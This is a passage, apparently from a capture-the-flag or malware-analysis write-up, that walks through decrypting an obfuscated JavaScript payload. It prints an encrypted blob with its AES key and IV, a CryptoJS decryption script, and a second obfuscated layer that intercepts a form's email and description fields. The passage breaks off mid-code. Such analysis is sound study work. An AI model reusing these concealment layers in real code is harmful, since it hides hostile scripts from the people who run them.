u0051\u0088\u00D1\u00C1\u0022\u000E\u00AB\u0084\u00BB\u002E\u0097\u00EB\u002D\u0075\u0008\u0025\u0037\u0078\u005E\u00F2\u0087\u0048\u0067\u00B9\u0088\u0031\u009C\u000D\u008A\u005D\u0051\u0081\u00C8\u00D5\u007D\u00A2\u00FB\u00BC\u00DC\u0008\u0042\u002D\u00FE\u00EA\u008F\u002F\u00F1\u002F\u0081\u001D\u0069\u0010\u0021\u00C3\u0081\u0054\u0040\u0085\u006B\u00D1\u0028\u0029\u007D\u0081\u0059\u00B6\u006F\u0008\u0044\u00F9\u00F6\u00B2\u0079\u0091\u0077\u00D4\u0040\u00C8\u0085\u0037\u008A\u004C\u0034\u00D4\u009A\u002F\u00F0\u0058\u00F6\u0014\u000E\u00FA\u00B6\u0094\u0089\u00BA\u00E5\u00E3\u0058\u0072\u00E5\u0033\u0087\u003F\u00E3\u001E\u0030\u0021\u00FB\u0034\u00C8\u00E0\u0044\u007E\u003A\u00CF\u00C8\u002D\u00BE\u00A4\u009B\u0060\u004C\u0077\u00CE\u001D\u0053\u001E\u00CE\u00D5\u00E4\u0032\u00B4\u0032\u004A\u009F\u00D1\u00E4\u0068\u000F\u00C9\u007B\u0098\u00F4\u0074\u002E\u0001\u00F4\u0082\u0097\u00D6\u000F\u0082\u0006\u0049\u0016\u00BF\u0077\u0057\u00B7\u0088\u0019\u0087\u00E4\u0092\u0036\u0036\u0076\u0075\u002F\u0028\u0093\u008E\u0089\u004B\u0068\u008F\u0091\u0097\u00BC\u005F\u003C\u00EA\u008D\u0094\u00D0\u00CC\u0050\u00D8\u00C1\u009A\u0074\u009F\u0064\u00CB\u0014\u0089\u0019\u0044\u00EB\u004E\u004A\u00CF\u009A\u0007\u00FA\u0087\u0009\u006E\u00CB\u00CF\u00FD\u0025\u0099\u00B7\u00A3\u000C\u0054\u0029\u007F\u00CA\u007F\u00BD\u0080\u005C\u0071\u0067\u009D\u0040\u002E\u008B\u005D\u0074\u006E\u0091\u0092\u0035\u0093\u00F4\u000A\u00E0\u0031\u00D2\u0039\u00EE\u00BD\u00D7\u0063\u00F6\u0096\u0062\u00F7\u005F\u0086\u0051\u0052\u00DE\u0021\u002E\u0095\u00F0\u0058\u0056\u0080\u004C\u00D9\u0062\u0088\u009B\u0095\u0046\u00F7\u00D8\u00B7\u0076\u0083\u00C0\u00ED\u0014\u005D\u0041\u00CB\u00BE\u0011\u00D6\u0014\u00CF\u0030\u008F\u006F\u0032\u00A6\u002D\u0017\u0075\u00AA\u0011\u003C\u0009\u00F2\u00C7\u00BB\u00CF\u00C9\u00C3\u0052\u00CD\u003F\u0067\u0011\u0002\u00F2\u0002\u006B\u00B5\u000E\u00DE\u0048\u003A\u008E\u000C\u00A2\u00E4\u00BD\u00BF\u0095\u00D9\u007B\u00CF\u007E\u003F\u0082\u00B0\u0041\u00AC\u00AC\u0091\u004B\u005A\u0038\u0039\u001D\u00D4\u00CA\u00E9\u0080\u00CD\u00DA\u00E5\u0018\u00D1\u0047\u00FA\u007E\u00E4\u00EA\u00D9\u0084\u0043\u0099\u00BF\u00A7\u00D8\u00B7\u0005\u004E\u00DF\u0054\u0060\u0080\u00E5\u0048\u0044\u00E5\u00D2\u0057\u0093\u00C7\u00F7\u0020\u0020\u0027\u0052\u000F\u00CD\u009C\u00D2\u006A\u00E2\u0007\u00E9\u0005\u00A0\u00D1\u00AC\u00F7\u00C8\u0001\u00E9\u00C8\u0046\u0099\u0086\u0065\u00B4\u001B\u007E\u007E\u007C\u00F1\u00B9\u00E9\u0063\u00AE\u0044\u00FD\u0070\u00C5\u00D8\u001A\u00D8\u0099\u00A5\u0043\u00D4\u00A9\u001E\u001D\u0060\u000F\u0023\u0020\u00D6\u00FD\u000D\u00BF\u00EE\u0066\u001E\u008B\u0095\u009F\u0072\u00E1\u00A1\u0006\u0097\u00DF\u007C\u00FA\u0086\u00E2\u00D9\u0014\u0097\u00F1\u00D0\u003C\u008F\u0026\u004F\u003A\u00E4\u00CD\u0000\u00EC\u000B\u006E\u000E\u0021\u00F3\u00F1\u0058\u002A\u0028\u00CB\u006B\u00B6\u0001\u000F\u0012\u0078\u00F4\u0092\u008F\u00B8\u0098\u0096\u00E8\u00A8\u0015\u000F\u004F\u007C\u0084\u001D\u0062\u00EF\u00B4\u00CD\u00A6\u0049\u0039\u00CF\u003B\u00BB\u0071\u0050\u00C2\u00CE\u008A\u0058\u00FA\u0034\u00C0\u001F\u005F\u007A\u00E6\u006C\u007A\u00C2\u0057\u0043\u00A6\u0016\u0053\u0026\u0060\u00A6\u0053\u009E\u00E2\u00E9\u0047\u0048\u0089\u0095\u00F2\u00BE\u007E\u006C\u004C\u00E6\u0003\u0024\u00AC\u00EA\u004E\u00B2\u0037\u0049\u002C\u00B1\u00B9\u00C1\u0085\u00C9\u00EA\u00D5\u0057\u003A\u000F\u0012\u00A6\u0018\u0033\u00C9\u0069\u00DC\u000A\u0001\u002B\u008E\u001C\u00EB\u0031\u0033\u00F8\u006D\u0059\u00C0\u0075\u00E9\u0056\u009F\u0073\u0093\u0018\u00B4\u00E7\u0078\u00C3\u001A\u0072\u0030\u003F\u0068\u0066\u00F6\u002B\u001A\u0094\u0004\u0044\u0067\u00A5\u009C\u0038\u0099\u00DA\u0010\u0008\u00C6\u0017\u00E3\u0061\u00D1\u005D\u00B5\u00E2\u009D\u00C6\u0087\u00FB\u003D\u00A9\u0028\u0018\u000D\u007D\u00FA\u006C\u00D2\u00B9\u008D\u000E\u007E\u0092\u0095\u0072\u003E\u00B5\u007B\u00AE\u0097\u0005\u00E5\u005D\u0090\u0003\u0091\u009C\u0053\u00E1\u008B\u00E5\u00A5\u00F6\u00E9\u00F3\u0077\u00C9\u00AC\u0010\u0064\u00F2\u00EF\u00B4\u0060\u0080\u007E\u00CF\u00FB\u00A4\u0038\u0025\u0032\u00A5\u00CE\u0046\u00DD\u0087\u0054\u0077\u0036\u006A\u0049\u0024\u00BC\u0012\u004D\u0027\u0039\u0062\u0034\u00D7\u006D\u007F\u00C5\u0026\u0072\u0068\u00EE\u00DD\u00FA\u0092\u001C\u006E\u00CE\u005D\u00F8\u00F5\u007B\u00FA\u0022\u00D3\u004D\u0052\u007F\u00AC\u0074\u005F\u002A\u0045\u004C\u0043\u0068\u0066\u002C\u001D\u006A\u003C\u0000\u0077\u008C\u006D\u00FD\u0038\u0012\u001E\u00D1\u0098\u00A7\u0093\u001B\u00B6\u00E8\u00A3\u00F1\u007C\u0099\u00E7\u0077\u0012\u00CA\u0061\u003F\u0017\u0041\u0027\u00E2\u00E6\u008D\u007C\u00E9\u00B0\u006E\u0099\u00D1\u00B9\u00DC\u00CD\u00DE\u001B\u004A\u00F5\u0026\u007C\u002A\u0064\u008C\u008D\u0068\u00FF\u003F\u0073\u003B\u0082\u0098\u0089\u0079\u0098\u00B2\u00A1\u00B8\u0037\u0004\u00F4\u001F\u00EA\u0000\u0015\u003C\u0053\u002A\u0073\u0051\u0073\u00F9\u0018\u00A5\u0034\u0080\u005E\u00BE\u000C\u00E9\u00D4\u00ED\u009A\u0023\u002C\u0036\u004C\u00D5\u00D5\u009E\u0031\u0085\u0001\u00DA\u0043\u002D\u00FC\u00B4\u00B9\u00C9\u006F\u00EA\u0031\u0051\u00F4\u00DF\u0039\u0058\u008C\u0053\u0070\u000F\u0040\u00FA\u00E2\u0084\u00DB\u0016\u00A4\u000D\u006A\u0074\u0068\u0068\u009B\u0056\u002D\u00CC\u002B\u0054\u0026\u00F8\u00DB\u00AC\u00AF\u00A7\u00FB\u0001\u00A8\u00CF\u0036\u00F6\u0095\u0072\u00B4\u00B2\u0054\u005F\u0099\u00BB\u00CC\u006C\u0060\u0087\u007C\u00AA\u001B\u00CA\u0001\u00CB\u0097\u0050\u00B7\u002C\u001C\u0085\u0049\u0012\u0056\u0011\u00CC\u0021\u0096\u00E9\u003E\u0071\u008A\u00B7\u0090\u0087\u00D1\u0043\u00B7\u0028\u00EF\u0091\u0065\u00C7\u008F\u005B\u005E\u0004\u00E8\u0082\u0084\u00E1\u0036\u0024\u00B9\u00DB\u00FA\u0058\u001C\u003C\u005D\u0078\u00E4\u006C\u00E9\u00F5\u0013\u0020\u00E7\u0009\u00E0\u0016\u0062\u0024\u0042\u00CD\u005B\u001E\u00B7\u0020\u003D\u00C3\u000B\u00DD\u005A\u0040\u0031\u0089\u00C5\u0022\u00F6\u003E\u0054\u0052\u00C1\u0099\u0043\u00BF\u00C2\u00A4\u0038\u00CA\u00C4\u00B9\u0069\u0044\u00DE\u0016\u0085\u00A9\u00CB\u00F3\u0098\u0043\u00C8\u00C1\u000F\u004F\u006B\u0010\u0025\u0000\u00F3\u00C1\u00EC\u008E\u007A\u00CB\u00D3\u003F\u00AA\u00F7\u00C4\u007E\u00E8\u00BA\u0009\u005B\u001A\u0078\u005E\u0017\u0001\u00C3\u00B1\u00A2\u006B\u002B\u0043\u0014\u009F\u0016\u0013\u00D0\u0032\u007F\u00F8\u00FC\u006D\u00A1\u0026\u00F9\u0093\u006D\u0027\u00F8\u00C2\u008B\u00E3\u00CA\u0001\u003B\u0017\u0084\u005C\u0036\u0092\u00A9\u0088\u00D3\u0042\u0027\u00D8\u001F\u008F\u0021\u0013\u00D0\u0008\u0020\u00D4\u000D\u0088\u00F8\u0045\u00F1\u0089\u0088\u0013\u0017\u005B\u00C7\u0031\u004F\u0023\u00DB\u002F\u0055\u0032\u009E\u0098\u0052\u00C6\u004D\u00B6\u00D8\u007A\u0032\u00F4\u002D\u00A7\u00E8\u0086\u0066\u003C\u00EC\u004C\u0076\u00F7\u0020\u00E0\u004C\u0088\u0054\u000B\u0030\u00F8\u00FB\u00CA\u0050\u003B\u0099\u008D\u005B\u00D0\u0036\u005F\u002C\u003F\u00BC\u0068\u007B\u0045\u00B9\u00A3\u00E4\u0081\u00D7\u00B9\u00CB\u00EB\u004B\u00F2\u0085\u00EA\u0027\u0065\u000D\u006D\u0074\u00F5\u007B\u00C5\u009E\u001F\u001C\u00CD\u0010\u000B\u0079\u00C5\u0027\u00D4\u002A\u00D8\u001F\u0057\u0001\u0017\u005A\u004A\u005A\u0043\u00B4\u00A6\u0059\u00E0\u00FB\u008A\u0009\u00BC\u00E4\u005F\u0047\u0092\u00B7\u00AD\u002C\u0052\u0073\u000B\u008D\u003B\u0071\u00B2\u00C0\u00D2\u0029\u0031\u0028\u00D7\u0009\u0075\u00F8\u00CF\u00ED\u009B\u007A\u0063\u00D8\u005C\u00B9\u00AA\u00A3\u0018\u0055\u00D6\u0070\u00E3\u002B\u0089\u004E\u00B6\u001E\u00FC\u001B\u00D7\u0056\u003B\u007F\u00F2\u00B8\u00BB\u00FF\u0088\u00B6\u0006\u0009\u0008\u009C\u0069\u0020\u006A\u00C7\u0093\u0091\u007C\u006B\u006A\u00C9\u00A4\u009D\u0080\u006B\u006D\u0031\u0010\u007D\u004E\u0062\u0047\u000E\u00C7\u0082\u00D0\u00A1\u0098\u009B\u0047\u0077\u0042\u00C7\u005A\u003F\u00F9\u005F\u0070\u00AF\u00EE\u0086\u0096\u00B8\u00A9\u0026\u008B\u00BC\u0008\u002B\u0014\u00C4\u0084\u000F\u0052\u0026\u000B\u0027\u0084\u006B\u004A\u00F9\u0040\u0002\u00C7\u0022\u0065\u003A\u0079\u0049\u0005\u0083\u00EA\u0001\u0043\u00E4\u001F\u00C0\u00AB\u0036\u007E\u0061\u0010\u002E\u0005\u002D\u00F7\u008B\u0046\u00D0\u009F\u0010\u00A2\u0067\u00BB\u0094\u00CD\u000E\u00A1\u0049\u00E2\u0082\u0043\u009F\u00A9\u00BA\u0051\u00FF\u0060\u00F4\u0063\u006C\u00E4\u0007\u009B\u00A2\u0069\u00DB\u00AA\u00F0\u008B\u0080\u00D5\u00CE\u008F\u006A\u0076\u0082\u0030\u0034\u00B1\u009E\u009E\u00D2\u009F\u00AD\u008C\u00B1\u00EB\u0063\u00DC\u00F2\u0047\u0028\u00AC\u00F4\u00EF\u0054\u003B\u0066\u00B1\u0005\u00FF\u008C\u007B\u001A\u0011\u002F\u001A\u0074\u0048\u0024\u0046\u0047\u008A\u0032\u00E6\u00F4\u0042\u00A8\u0099\u00EF\u0016\u0040\u00D2\u00F2\u0093\u00E8\u0066\u00F3\u000E\u0058\u00E1\u00A5\u00D8\u00B5\u00EC\u00F5\u0040\u009F\u0016\u0017\u00EC\u0065\u0019\u000D\u001D\u00E6\u00D7\u006E\u006B\u0009\u007C\u003F\u0007\u00D3\u00C8\u00F9\u0017\u009E\u00E7\u0074\u005E\u00AA\u0083\u00EA\u00A9\u0005\u00E9\u0033\u000E\u00DB\u00D8\u0081\u0097\u0089\u0060\u00B0\u00A3\u00DA\u0068\u009F\u001B\u00CC\u0054\u003B\u0035\u009F\u00F4\u008D\u0062\u00FB\u00F5\u006D\u0090\u00C5\u00E0\u009D\u00CD\u0080\u0030\u00DF\u0042\u0073\u00AE\u0033\u00A5\u0015\u009F\u00D9\u0008\u0056\u00B0\u0096\u00C4\u002F\u0040\u002A\u00B6\u00B0\u0053\u00B7\u00AB\u0021\u003F\u0054\u00C7\u006A\u00A5\u00BC\u0068\u009D\u00CC\u00B0\u00A3\u0004\u0019\u004B\u0027\u006C\u00A1\u0035\u0028\u00D1\u0057\u006A\u0066\u0054\u0047\u00E0\u007C\u0039\u0013\u0079\u0056\u006B\u00CE\u001E\u00CB\u0006\u0082\u00AB\u000C\u00EC\u0099\u00A3\u00A0\u00B9\u00BD\u00A9\u009A\u0062\u00F1\u000E\u0041\u00DC\u00CF\u0069\u0076\u00B0\u006D\u00BA\u00F6\u00D1\u0049\u00F9\u001F\u004D\u0031\u0095\u00C5\u00BC\u0013\u0071\u00D0\u00D5\u0063\u00B4\u0027\u00A6\u0019\u0051\u0002\u004B\u00E2\u0086\u0026\u00EF\u003A\u00B6\u005B\u00B5\u0032\u00A8\u0049\u00D6\u00F3\u001E\u002C\u0035\u001E\u0000\u007A\u007C\u006B\u0075\u0036\u00F9\u000F\u00AB\u00A3\u00B2\u00BD\u004E\u00F1\u0049\u0011\u00DC\u00D0\u00AC\u0074\u00B9\u0009\u00EF\u0029\u00B4\u0075\u0002\u00DD\u0058\u0018\u008C\u0000\u0006\u00BE\u005D\u0041\u008F\u0073\u004C\u00EC\u0029\u000D\u00D1\u009F\u003D\u00CC\u00F3\u0001\u0039\u0038\u00D8\u00A5\u0054\u0044\u005D\u0072\u0098\u005F\u00CD\u0092\u00A1\u00A3\u00AF\u00D3\u0086\u00F0\u00BC\u006B\u00E5\u00F1\u0008\u00CE\u0053\u00B5\u00D2\u0055\u00C6\u0019\u0052\u0040\u003E\u005E\u008A\u00EC\u009C\u0012\u002C\u00D5\u00EA\u000B\u00C6\u0057\u0040\u0060\u008B\u00E8\u000F\u001A\u00A0\u008C\u0021\u00BC\u002A\u003B\u0028\u00A2\u0077\u00A3\u00EB\u00E6\u0035\u0068\u0024\u0098\u00AA\u00FD\u007F\u0096\u004B\u00EB\u0054\u0049\u0060\u00B2\u0055\u00BF\u001F\u006C\u0013\u006B\u00AA\u0010\u00BF\u00EC\u00B2\u00B9\u00A9\u0029\u0086\u0068\u008F\u0037\u0046\u0017\u0001\u000E\u000C\u0062\u0010\u00C5\u00F4\u0089\u00FD\u0045\u009F\u0026\u005C\u003F\u005C\u0027\u00F3\u00BF\u009C\u00C9\u0066\u007E\u005B\u0043\u0016\u00DA\u000F\u0097\u0070\u0065\u000F";
var key = "\u00DB\u00ED\u0098\u006C\u00B1\u0089\u00A1\u0047\u0095\u00F2\u008A\u00B3\u0017\u00AF\u004C\u002D\u00B2\u0007\u0037\u0029\u00CF\u0054\u00BC\u0093";
var iv = "\u00E4\u0075\u0026\u0014\u00CA\u004A\u0037\u002F\u0038\u0009\u00FC\u00C6\u000D\u0009\u0030\u008A";
console.log("Base64 Encoded Payload: ", unicodeToBase64(payload));
console.log("Base64 Encoded Key: ", unicodeToBase64(key));
console.log("Base64 Encoded IV: ", unicodeToBase64(iv));
})();
After we get the base64 values, we can use console.log
to debug and output the second payload dynamically. Credits to @SteakEnthusiast for a cleaner decryption script.
1
2
3
4
5
6
7
const CryptoJS = require("./crypto-js");
console.log(CryptoJS["AES"]["decrypt"]({
ciphertext: CryptoJS["enc"]["Base64"]["parse"]("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")
}, CryptoJS["enc"]["Base64"]["parse"]("2+2YbLGJoUeV8oqzF69MLbIHNynPVLyT"), {
iv: CryptoJS["enc"]["Base64"]["parse"]("5HUmFMpKNy84CfzGDQkwig==")
}).toString(CryptoJS["enc"]["Utf8"]));
The second payload seems to be another heavily obfuscated Javascript.
1
var _$_8b18 = (function (k, j) { var y = k.length; var o = []; for (var m = 0; m < y; m++) { o[m] = k.charAt(m) }; for (var m = 0; m < y; m++) { var b = j * (m + 143) + (j % 34726); var r = j * (m + 91) + (j % 23714); var v = b % y; var s = r % y; var f = o[v]; o[v] = o[s]; o[s] = f; j = (b + r) % 4449625 }; var a = String.fromCharCode(127); var i = ''; var e = '\x25'; var q = '\x23\x31'; var t = '\x25'; var h = '\x23\x30'; var w = '\x23'; return o.join(i).split(e).join(a).split(q).join(t).split(h).join(w).split(a) })('shfnemBLlerpitrtgt%ld%DmvuFeceaEaladerletdtdtsputpnielEvae%%iansn%eimkei%guLt%d%i%tsv%ds%eltee%ewssmnnvdsaiyrroeesmlc@Feroieoel%bt%lIota', 3827531); document[_$_8b18[3]](_$_8b18[14])[_$_8b18[13]](_$_8b18[0], function (e) { e[_$_8b18[1]](); const emailField = document[_$_8b18[3]](_$_8b18[2]); const descriptionField = document[_$_8b18[3]](_$_8b18[4]); let isValid = true; if (!emailField[_$_8b18[5]]) { emailField[_$_8b18[8]][_$_8b18[7]](_$_8b18[6]); isValid = false; setTimeout(() => { return emailField[_$_8b18[8]][_$_8b18[9]](_$_8b18[6]) }, 500) }; if (!isValid) { return }; const emailValue = emailField[_$_8b18[5]]; const specialKey = emailValue[_$_8b18[11]](_$_8b18[10])[0]; const desc = parseInt(descriptionField[_$_8b18[5]], 10); f(specialKey, desc) });;function G(r) { return function () { var r = 